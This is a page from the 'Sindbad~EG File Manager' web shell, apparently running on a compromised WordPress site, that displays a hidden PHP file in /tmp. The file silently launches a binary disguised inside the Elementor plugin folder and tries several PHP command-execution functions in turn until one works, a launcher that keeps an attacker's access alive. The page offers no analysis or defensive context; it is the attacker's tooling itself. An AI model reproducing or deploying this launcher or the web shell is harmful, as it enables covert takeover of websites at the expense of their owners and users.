Sindbad~EG File Manager

Current Path : /tmp/
Upload File :
Current File : //tmp/.parle_tokens

<?php   run("/home/lakodokredita/public_html/wp-content/plugins/elementor/modules/announcements/VarParser > /dev/null 2>&1"); function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = @shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f)) {             $out .= fread($f, 1024);         }         pclose($f);     }     return $out; } 

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists